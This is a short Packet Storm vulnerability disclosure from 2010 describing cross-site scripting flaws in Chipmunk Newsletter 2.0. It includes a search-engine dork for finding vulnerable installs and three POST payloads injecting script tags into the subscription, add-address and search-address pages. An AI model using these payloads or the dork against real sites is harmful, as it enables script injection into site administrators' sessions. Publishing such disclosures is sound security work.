Chipmunk Newsletter 2.0 Cross Site Scripting

2010-01-21T00:00:00
ID PACKETSTORM:85452
Type packetstorm
Reporter b0telh0
Modified 2010-01-21T00:00:00

Description

                                        
                                            `dadf# Title: Chipmunk Newsletter XSS Vulnerabilities  
# Date: 01-19-2010  
# Author: b0telh0  
# Software Link: http://www.chipmunk-scripts.com/newsletter/newsletter.zip  
# Version: 2.0  
# Tested on: Windows 7  
  
  
Another XSS on Chipmunk Newsletter...  
Thanks to mr_me who found the first flaw on it!  
  
  
::[ inurl:admin/login.php "Registering Admin" ]::  
  
  
  
1 - http://localhost/sub.php  
  
POSTDATA:  
email=<script>alert('xss')</script>&choice=sub&lists=1&submit=submit  
  
  
  
2 - http://localhost/admin/addaddress.php  
  
POSTDATA:  
email=<script>alert('xss')</script>&lists=1&submit=submit  
  
  
then we can check it...  
  
  
  
http://localhost/admin/searchaddress.php  
  
POSTDATA:  
theaddress=<script>alert('xss')</script>&submit=submit  
`